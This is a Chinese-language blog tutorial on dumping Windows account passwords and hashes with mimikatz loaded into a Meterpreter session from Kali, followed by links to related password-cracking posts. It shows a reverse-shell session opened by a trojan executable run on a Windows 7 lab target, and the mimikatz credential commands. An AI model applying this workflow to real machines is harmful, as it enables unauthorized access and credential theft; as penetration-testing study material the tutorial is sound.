Kali破解windows系统用户名密码工具mimikatz
mimikatz工具简介
mimikatz是一款强大的系统密码破解获取工具。该工具有段时间是作为一个独立程序运行。现在已被添加到Metasploit框架中,并作为一个可加载的Meterpreter模块。当成功的获取到一个远程会话时,使用mimikatz工具可以很快的恢复密码。本节将介绍使用mimikatz工具恢复密码。
windows2012以下的系统给可直接获取到明文,2012以上的系统只能获取到hash值。
实例演示
(1)通过在目标主机(Windows 7)上运行kali创建的可执行文件木马程序backup.exe,获取一个远程会话。如下所示:
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.6.103:4444
[*] Starting the payload handler…
[*] Sending stage (769536 bytes) to 192.168.6.110
[*] Meterpreter session 2 opened (192.168.6.103:4444 -> 192.168.6.110:1523) at 2014-07-19 16:54:18 +0800
meterpreter >
从输出的信息中,可以看到获取到了一个与目标靶机的远程会话。
(2)确认目标用户的权限。执行命令如下所示:
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
tips:注意,运行此工具执行命令需要管理员权限,所以我个人建议在内网渗透中首先应该进行提权,再进行后续操作。
从输出信息中,可以看到当前用户已经是系统权限。此时,就可以进行其他操作了。
(3)加载mimikatz模块。执行命令如下所示:
meterpreter > load mimikatz
Loading extension mimikatz…success.
从输出的信息中,可以看到mimikatz模块已加载成功。
(4)查看mimikatz模块下有效的命令。执行命令如下所示:
meterpreter > help
执行以上命令后,会输出大量的信息。其中,在Meterpreter中所有的命令都已分类。这里主要介绍下mimikatz相关的命令,如下所示:
Mimikatz Commands
=================Command Description------- -----------kerberos Attempt to retrieve kerberos credslivessp Attempt to retrieve livessp credsmimikatz_command Run a custom commanndmsv Attempt to retrieve msv creds (hashes)ssp Attempt to retrieve ssp credstspkg Attempt to retrieve tspkg credswdigest Attempt to retrieve wdigest creds
这里help对此工具模块列出了所有命令,大家可以进行翻译查看提示选择对应的命令进行后续操纵。
以上输出信息显示了可执行的Mimikatz命令。如回复kerberos信息、livessp信息和哈希信息等。
【实例8-4】恢复哈希密码。执行命令如下所示:
执行以上命令后,输出五列信息。分别表示认证ID、包、域名、用户名和密码。从该界面可以看到,当前系统中bob用户的哈希密码值中。在哈希密码值中,前面的lm表示使用LM方式加密;ntlm表示使用NTLM方式加密。
【实例8-5】获取kerberos(网络认证协议)信息。执行命令如下所示:
以上输出的信息就是当前用户摘要式身份验证的信息。
【实例8-7】恢复livessp身份验证信息。执行命令如下所示:
以上输出的信息显示了当前用户livessp身份验证信息。
总结
此工具在内网渗透中用处非常大,各位看官用到的可以观赏此文,喜欢请您点个关注点个赞,给予我不竭的动力,继续努力!成为中国网安力量的一员。
Kali破解windows系统用户名密码工具mimikatz相关推荐
- 使用Hashcat破解Windows系统账号密码
使用Hashcat破解Windows系统账号密码 Simeon 笔者最近对oclHashcat工具破解密码进行了研究,偶有所得,因此撰文跟大家一起分享,本次破解对象选择破解Windows7用户密码.o ...
- 【CyberSecurityLearning 3】批处理、用户与组管理、服务器远程管理、破解Windows系统密码
目录 一.批处理编写 1.1.批处理作用 1.2.如何创建批处理 1.3.批处理基本语法 1.3.1.@echo off 1.3.2.pause 1.3.3.title 1.3.4.echo. 1.3 ...
- 二 PE破解windows系统密码
这里写目录标题 window7及window10 破解方式 第一步 第二步 第三步 第四步 第五步 最后一步 总结 本期,是 黑客学好好,牢饭香喷喷合集的第二篇 这期的目的与上次类似,也是破解wind ...
- 1.2物理接触获取并破解windows系统密码
1.2物理接触获取并破解windows系统密码 很多人认为个人计算机比较安全,因为给计算机设置了密码,外人不知道设置的密码,因此也就安全了,其实这里面很很大的误解,个人计算机安全除了设置密码强健程度以 ...
- 破解Visra系统登录密码
微软苦心"打磨"了五年的操作系统,一再宣称是"史上最安全"的Windows Vista竟然是如此的脆弱,系统登录密码竟然是形同虚设!不论是谁,只要拥有一张Vis ...
- windows系统-web渗透工具-AWVS
windows系统-web渗透工具-AWVS ACUNETIX WEB VULNERABILITY SCANNER(AWVS) Awvs是一款很出名的web安全扫描器,属于windows系统平台下最流 ...
- Windows系统封装初始化工具sysprep
Windows系统封装初始化工具sysprep Sysprep简介 Sysprep程序是微软公司用来配置Microsoft Windows全新安装的一个工具,是为方便企业用户部署系统而设计的. Sys ...
- 用 Kali 实现爆破获取用户名密码
确定Kali连上了网 进入选项-设置,修改代理 preferen–setting 然后打开burpsuite 设置代理 按步骤设置代理地址端口,和浏览器设置一样 然后在浏览器里面输入搭建好的服务器地址 ...
- 华为服务器windows系统密码,华为云windows系统默认密码
华为云windows系统默认密码 内容精选 换一换 华为云帮助中心,为用户提供产品简介.价格说明.购买指南.用户指南.API参考.最佳实践.常见问题.视频帮助等技术文档,帮助您快速上手使用华为云服务. ...
最新文章
- 玩转JavaScript正则表达式
- ffmpeg: error while loading shared libraries: libavdevice.so.52
- 谷歌的量子计算机速度,谷歌称其量子计算机速度比传统计算机快1亿倍
- ECharts 浙江地图实践
- SQL Server删除整个数据库中表数据的方法(不影响表结构)
- Systemd管理示例
- java中return提醒不兼容的_JAVA报return为不兼容类型
- 2021年中国直播电商投融资情况及行业发展中存在的问题、发展趋势和对策分析[图]
- 如何防止sql注入?防止sql注入方法介绍
- 教你快速设计正交试验及试验数据分析
- 1周前,一个对外挂一无所知的人,在的成长过程(经典推荐)
- gradle报错this sometimes occurs after a network connection timeout.解决
- Uniformly Distributed
- QQ透明头像通用设置教程!不仅简单而且免费!
- 生成时间序列每月月初月末
- 面向资源受限安全芯片的开放式运行环境设计
- LaTeX代码: 表格 ← 利用 tabular
- sql joins图示
- .net仿google analysis第三方流量监测
- 奶爸日记4 - 海边看轮船玩滑梯